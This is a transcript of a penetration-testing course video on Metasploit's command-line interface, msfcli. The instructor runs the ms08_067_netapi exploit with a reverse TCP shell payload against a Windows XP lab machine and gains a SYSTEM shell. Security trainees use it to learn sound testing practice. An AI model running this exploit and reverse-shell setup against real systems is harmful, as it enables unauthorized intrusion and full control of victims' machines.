Metasploit (part 5) msfcli

Video Activity

This video discusses the Metasploit command line interface (msfcli). With msfcli a Metasploit module is selected, its payload and options set, and the module run from a single command. When scripting, asking msfcli for the payloads first can save steps, such as asking for the module and payload options separately, and increases efficiency. The goal is to be able to do it all in one line.

Time: 14 hours 26 minutes
Difficulty: Advanced
CEU/CPE: 15
Video Transcription
00:04
Now we're going to look at Metasploit's command line interface, or msfcli. We're back at Kali's main command line, we're outside of msfconsole. msfcli and then -h to get the help information.
00:19
So what we want to do here is actually create our Metasploit module in one line, instead of doing use module name, show options, set any relevant option one by one, set a payload, setting the options for that, and then finally exploit or run.
00:35
We are actually going to do it all in one line. This I've found to be useful for two different things. One, if you want to use Metasploit with a tool like my Smartphone Pentest Framework; whenever it interacts with Metasploit, I use the command line interface,
00:50
since it allows me to do everything in one line. It's very scriptable for use in programs, so I know a lot of other tools do the same, they use the command line interface. So it's worth knowing if you ever build any tools that are going to interact with Metasploit, and many of them do, since Metasploit is a very powerful standard
01:08
in information security. Also, if you are building Metasploit modules, which again we will write one of our own in the exploit development section.
01:19
If you are like me and make syntax errors when you are programming, which many, many programmers do,
01:26
you will have to. If you use msfconsole, you'll have to reload the entire module tree every time,
01:32
which you can do from msfconsole, to
01:36
take into account the changes you made to try and fix the syntax. But with msfcli, you can hit the up arrow, get the previous command, so I think it's a little bit faster. In general it's a little bit slower, as you'll see, because it does have to load the module tree every time we run it.
01:53
But for exploit development, for building Metasploit modules, I've found this a little bit faster, so I prefer it in that case. Again, generally I use msfconsole, so we're just going to use msfcli briefly
02:06
and just see how to do it.
02:07
So here we have
02:09
our options that we can use here.
02:12
So basically, again, what we want to do is create
02:15
our exploit or our auxiliary or handler, anything we want to do, the Metasploit module, all in one line. So we are going to set our options like this: option equals value. So instead of set option and then the value with spaces, we'll just say option=value. Then finally, we'll put the mode.
02:32
We see all our modes down here. Some of them we've seen before, like options, payloads, summary, that's like info,
02:39
and targets. We've seen those. So instead of saying show options or show payloads or show targets, we can use these modes at the end: a big O, a big P, big S, big T. We also have execute, that's like exploit or run. Help, we're looking at that as it says,
02:59
some of the other ones we will see in the class, like advanced. We haven't seen those yet. Check, we'll see that.
03:06
But we aren't going to need those here. So what we want to do first is come up with a module we want to use. Let's stick with that exploit,
03:15
windows/smb/ms08_067_netapi, the same one we used previously when we did our msfconsole exploit. I don't want to give away too many of the vulnerabilities that are actually here. We will work through finding them, so we'll just stick with this one that we know is here
03:36
for now.
03:37
And we can see our options with a big O.
03:39
We could ask it the options, but we know we also need to set a payload. We are going to have to set options for that payload as well. So we actually save ourselves a step if we just go ahead and ask what the payloads are,
03:53
and we can skip all of these intermediate steps. In fact, if you're doing this inside of a script, you're going to run a specific exploit. You will
04:03
know what those options are. As you use, for instance, ms08_067_netapi over and over again, you become familiar with what the options are, what the payload you want to use is,
04:14
and what its options are as well. But there are many, many Metasploit modules, so it's always good to know how we can ask. The goal here is to make it all one line in the end, but we can use these
04:27
mode flags, too,
04:29
to help us out. So we'll start with the big P, ask it what its payloads are. We used windows/shell/bind_tcp in our previous example,
04:40
so we can use
04:42
any of these payloads that come up. So we should see lots of Windows payloads here. That is again loading the module tree on the fly here, whereas with msfconsole it's a bit faster because it loads the module tree at the beginning and keeps it loaded,
04:58
so you can look through this list. I encourage you to spend some time trying different payloads. But let's just set PAYLOAD equals. Again, it's option equals and then what we want to set it to.
05:10
So windows/shell/
05:12
reverse_tcp, again with the two slashes. So this is going to be staged. We have PAYLOAD=windows/shell/reverse_tcp. And now we can do that big O
05:26
to ask for the options. And now this will show us the options for both the module, the exploit ms08_067, and the payload, so the windows/shell/reverse_tcp. We've kind of skipped a step here. We could have asked for the options first and then set the payload, but this way we can get all the options in one step,
05:47
and again we can skip the steps as we become more familiar with it. You can
05:51
just go ahead and write everything out without asking it anything, if you are able.
05:57
So,
05:59
familiar here: RHOST, so that's going to be the IP address of Windows XP,
06:03
RPORT 445, SMBPIPE is BROWSER. We now know that that is correct from the auxiliary module we ran in the previous video.
06:15
So the only thing we need to set down here with the payload is
06:19
LHOST. It also has LPORT, so that's going to be the port to listen on. And LHOST, unlike with our bind shell where it just had the port to open the shell on, 4444 by default on that as well,
06:33
LHOST is going to be the host to call back to. So we need to give the IP address of Kali. In this case, you could set up the listener somewhere else,
06:42
in an EC2 instance in the cloud if you want to. It doesn't necessarily have to call back to the same Metasploit instance that we used to set it up, but
06:53
that's what we'll do here, we'll have it call back to Kali.
06:56
So let's see, what is Kali's IP address? Very good question. In my case, 192.168.1.77. Yours is probably different.
07:05
Let's get rid of this thing. Oh, here.
07:09
And we need to set RHOST equal to the IP address of
07:16
our XP machine. In my case, it's 192.168.1.6. Actually, I started typing in
07:24
IP addresses from the other network. Haven't gotten into that one yet. There's a second network lying around here.
07:31
So that's our RHOST,
07:33
RPORT and SMBPIPE are fine. So LHOST equal to the IP address
07:42
of our Kali machine, so 192.168.1.77 in my case,
07:48
and we can set LPORT if we want to change it from 4444. You know how to do that, same way: LPORT equals and then whatever port we want,
07:59
but it looks good to me. Let's go ahead and run it. So we do E for execute to run it.
08:05
So from here, it should work the same way as in msfconsole. It should set up a payload handler, this time for our reverse payload,
08:11
be able to handle the staged payload.
08:16
It does need to load the module tree first, so msfconsole is a little bit faster. Then there we go. We should have
08:22
a new shell here. So
08:26
the flaky thing with Metasploit, occasionally it seems to not actually give us the
08:31
prompt. So it should show us that C:\Windows\System32 here.
08:37
Just go ahead and abort it with Ctrl-C. Try it again, see if it works this time. I don't see that happening with Meterpreter, and we will
08:45
use Meterpreter extensively,
08:48
occasionally with command shells that happens. I like to start with the command shells.
08:52
See, there you see C:\Windows\System32. Now we have a prompt and we can start running system commands, use
09:03
any Windows commands that we want. We are SYSTEM, so we should have access to everything
09:09
and, you know, you can again Ctrl-C to get rid of it.
09:15
So very similar to msfconsole, really. The whole point is that we now have the ability to run things in one line so we can script it. My main usage for it is for scripting inside of other programs when I want to talk to Metasploit. So I think it's worth knowing, but again we will spend most of our time
09:31
in msfconsole when we use Metasploit in this class.